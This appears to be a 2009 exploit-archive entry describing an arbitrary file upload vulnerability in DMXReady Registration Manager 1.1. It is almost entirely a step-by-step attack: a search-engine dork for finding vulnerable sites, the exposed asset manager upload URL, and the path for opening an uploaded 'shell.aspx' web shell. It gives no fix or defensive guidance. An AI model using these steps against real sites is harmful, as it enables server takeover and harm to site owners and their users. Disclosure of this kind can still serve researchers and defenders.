[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : DMXReady Registration Manager 1.1 Arbitrary File Upload Vulnerability
# Published : 2009-05-20
# Author : Securitylab.ir
# Previous Title : Realty Web-Base 1.0 (list_list.php id) SQL Injection Vulnerability
# Next Title : PHP Article Publisher Arbitrary Auth Bypass Vulnerability


######################### Securitylab.ir ########################
# Application Info:
# Name: DMXReady Registration Manager
# Version: 1.1
# Website: http://www.dmxready.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Arbitrary File Upload Vulnerability
# Risk: High
# Dork: "inc_webblogmanager.asp"
#===========================================================
# http://site.com/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp
# select file and uploaded
# view file : http://site.com/assets/webblogmanager/shell.aspx
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

# www.Syue.com [2009-05-20]